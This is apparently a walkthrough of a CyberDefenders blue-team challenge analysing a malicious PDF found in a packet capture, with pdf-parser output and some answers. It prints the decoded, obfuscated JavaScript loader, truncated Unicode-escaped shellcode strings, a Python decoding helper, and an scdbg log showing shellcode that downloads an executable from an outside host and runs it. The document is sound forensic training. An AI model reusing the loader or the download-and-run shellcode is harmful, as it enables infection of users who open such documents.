
Intro

CyberDefenders.org hosted a challenging reverse-engineering challenge: a malicious PDF carrying obfuscated JavaScript and Unicode-escaped shellcode payloads. It was an interesting one…

For those who don’t know CyberDefenders, they host a platform dedicated to training blue-team skills (incident response, digital forensics, security analysis, etc.). If you are used to VulnHub and Hack The Box, those services are typically geared more towards red teaming and penetration testing. This is where CyberDefenders stands out!

Walkthrough

1) How many URL path(s) are involved in this incident?

Answer:

6

However, I counted 5 unique URLs (folders and files).

2) What is the URL which contains the JS code?

Answer:

http://blog.honeynet.org.my/forensic_challenge/

3) What is the URL hidden in the JS code?

Answer:

http://blog.honeynet.org.my/forensic_challenge/getpdf.php

4) What is the MD5 hash of the PDF file contained in the packet?

Hint:

  • Wireshark ->Export Objects -> HTTP

Answer:

659cf4c6baa87b082227540047538c2a

5) How many object(s) are contained inside the PDF file?

python pdf-parser.py ../fcexploit.pdf -a
Comment: 10
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 18
  7: 5, 7, 9, 10, 22, 23, 28
 /Action 1: 4
 /Annot 3: 6, 8, 24
 /Catalog 2: 1, 27
 /EmbeddedFile 1: 11
 /Page 2: 3, 25
 /Pages 2: 2, 26
Search keywords:
 /JS 1: 4
 /JavaScript 1: 4
 /OpenAction 1: 1
 /AcroForm 1: 27
 /EmbeddedFile 1: 11
 /XFA 1: 28

Answer:

19

6) How many filtering schemes are used for the object streams?

strings ../fcexploit.pdf | grep -i filter
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]

Answer:

4

7) What is the number of the ‘object stream’ that might contain malicious JS code?

obj 4 0
 Type: /Action
 Referencing: 5 0 R

  <<
    /Type /Action
    /S /JavaScript
    /JS 5 0 R
  >>

 << /Type /Action /S /JavaScript /JS 5 0 R >> 

Answer:

5

8) Analyzing the PDF file. What ‘object-streams’ contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ‘,’. Put the numbers in ascending order

Answer:

7,9

9) The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine?

Object 5 decoded:

var SSS=null;var SS="ev";var $S="";$5="in";
app.doc.syncAnnotScan();S$="ti";if(app.plugIns.length!=0){
var $$=0;S$+="tl";$5+="fo";____SSS=app.doc.getAnnots({nPage:0});S$+="e";$S=this.info.title;}
var S5="";if(app.plugIns.length>3){
  SS+="a";var arr=$S.split(/U_155bf62c9aU_7917ab39/);
  for(var $=1;$<arr.length;$++){
    S5+=String.fromCharCode("0x"+arr[$]);
  }SS+="l";
}
if(app.plugIns.length>=2){app[SS](S5);}

Use SpiderMonkey to decode the payload, then URL-decode the output to see some more code…

payload = unescape("%uabba%ua906%u29f1%ud...");
...

function cN() {
        var o = "o";
        // freecell.exe payload
        var payload = unescape("%uc929%u65b1%ud7db%u74d9...");
...
        var shellcode = unescape("%uc931%u64b1%ub6bf%u558b%ud976%ud9cd%u2474%u58f4%ue883%u31fc%u0d78%u7803%ue20d%u6043%u2c45%u44e1%ub6af%u964c%ub72e%ued9a%u55a9%u1a18%u71cc%u2237%u7e30%u91b7%u1856%ue9ae%u2394%u7479%ucdff%u5e6b%ufc95%ue562%u12a2%u77ad%u53d8%u925f%u4178%ue5b2%ufc62%uf826%ub883%u9e2c%u6c59%uf5dd%u5d2a%uc113%uc7c1%ub031...");

...
var vvpethya = unescape("%ud3b8%u7458%ud901%u2bcb%ud9c9%u2474%ub1f4%u5a65%u4231%u0312%u1242%u3983%u96a4%u56f4%u0d45%u9bbd%ud7af%ue7f8%u982e%u1dcf%u7aa8%ucad5%u92cf%uf3c1%u9d2f%u4766%ufb49%u941e%uc494%u8389%uacfe%u6ad8%udd95%u0935%uf3a2%u801c%ub2d9%u488c%u2678%u0b5c%udd62%u01f4%u5b82%u4792%u4b5e%u2d2e%ubc2a%uf9ff%ue4c1%u9b9a%u83f7%ucc69%u3938%u1fb1%u7e29%uc50b%ue214%u8248%udcd8%ub3b7%u890b%ue425%uab91%u5210%u5192%uc8fc%u9932%u9def%ubaa1%u0795%u1c9f%uacee%uc5ba%u4b1c%uaf20%u0832%u3e47%u9129%uacf0%ude04%u1062%ue9e7%u0804%uf391%ubf69%ucc69%u71f0%u1108%uccee%u0d20%ubecf%ub462%ud949%u9971%u15e3%u3c5a%ub053%u5d89%u6c82%u6648%u07ae%u7ad2%u148a%ub09d%u1572%u1aab%u33e6%u5a91%ub8af%u4744%udd4a%u8b98%u47f2%u2af0%ub1cc...");

Decode the %u-escaped shellcode into raw bytes (each %uXXXX word is stored little-endian, so %ud3b8 becomes b8 d3) and save the resulting 0x1ac bytes to download.dat for the emulators.
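As an added example (not the challenge's or the author's code), the two decoding layers above, the hex-in-/Title trick of object 5 and the %u-escaped shellcode strings, reproduced statically in Python on constructed input. TITLE_MARKER is the delimiter from the page; SAMPLE_TITLE, SAMPLE_JS and all function names are my own assumptions.

```python
import re

# Delimiter the object-5 script splits the /Info /Title string on (taken from the page).
TITLE_MARKER = "U_155bf62c9aU_7917ab39"

# Constructed /Title: a harmless prefix, then one hex byte per chunk spelling "var s=1;".
# The real sample hides its second-stage JavaScript here and hands it to app.eval().
SAMPLE_TITLE = TITLE_MARKER.join(
    ["Doc", "76", "61", "72", "20", "73", "3d", "31", "3b"])

# Constructed second-stage fragment; the %u words are the first ones shown on the page.
SAMPLE_JS = 'var o = "o";\nvar vvpethya = unescape("%ud3b8%u7458%ud901%u2bcb");\n'


def decode_title_payload(title):
    """Do what object 5 does up to, but not including, app[SS](S5): split the title on
    the marker, skip arr[0] (the prefix), and turn each hex chunk into one character."""
    chunks = title.split(TITLE_MARKER)[1:]
    return "".join(chr(int(h, 16)) for h in chunks)


def extract_unescape_strings(js):
    """Collect every unescape("...") literal from decoded JavaScript, in source order."""
    return re.findall(r'unescape\("([^"]*)"\)', js)


def unescape_to_bytes(s):
    """Turn a JavaScript unescape() argument into the bytes it occupies in memory:
    %uXXXX is a UTF-16 code unit stored little-endian (%ud3b8 -> b8 d3), %XX one byte."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", s):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def shellcode_blobs(js):
    """Map each unescape() literal in decoded JS to its raw bytes, ready to be written
    to a file such as download.dat for scdbg or Speakeasy."""
    return [unescape_to_bytes(u) for u in extract_unescape_strings(js)]


if __name__ == "__main__":
    print(decode_title_payload(SAMPLE_TITLE))      # var s=1;
    for blob in shellcode_blobs(SAMPLE_JS):
        print(len(blob), blob.hex(" "))             # 8 b8 d3 58 74 01 d9 cb 2b
```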

The shellcode is encoded with the Metasploit shikata_ga_nai encoder, so you either need a decoder or a shellcode emulator to recover the original, unobfuscated shellcode.

First we tried to run the shellcode through the Mandiant/FireEye Speakeasy emulator, but it failed to provide the full download path of the executable.

Next, we went back to good ole scdbg, which was able to provide the full download path:

scdbg.exe /f download.dat
Loaded 1ac bytes from file download.dat
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

401104  GetProcAddress(GetSystemDirectoryA)
401104  GetProcAddress(WinExec)
401104  GetProcAddress(ExitThread)
401104  GetProcAddress(LoadLibraryA)
4010af  LoadLibraryA(urlmon)
401104  GetProcAddress(URLDownloadToFileA)
4010d3  GetSystemDirectoryA( c:\windows\system32\ )
4010ec  URLDownloadToFileA(http://blog.honeynet.org.my/forensic_challenge/malware.4.exe, c:\WINDOWS\system32\a.exe)
4010f3  WinExec(c:\WINDOWS\system32\a.exe)
4010f7  ExitThread(32)

Answer:

c:\Windows\System32\a.exe

10) The PDF file contains another exploit related to CVE-2010-0188. What is the URL of the malicious executable that the shellcode associated with this exploit drops?

Hint:

  • PCAP URLs

Answer:

http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe

11) How many CVEs are included in the PDF file?

Refer to the various shellcodes from question 9:

  • Payload #1 - CVE-2009-4324
  • Payload #2 - CVE-2008-2992
  • Payload #3 - CVE-2007-5659
  • Payload #4 - CVE-2009-0927

Payload #5 is the only one that will be executed when first opening the PDF. The other four payloads will work individually, but none will be fired from the PDF file, due to the lack of action trigger and broken JavaScript.

  • Payload #5 - (CVE-2010-0188, TIFF): http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe

This last one is also detected by VirusTotal!

Answer:

5
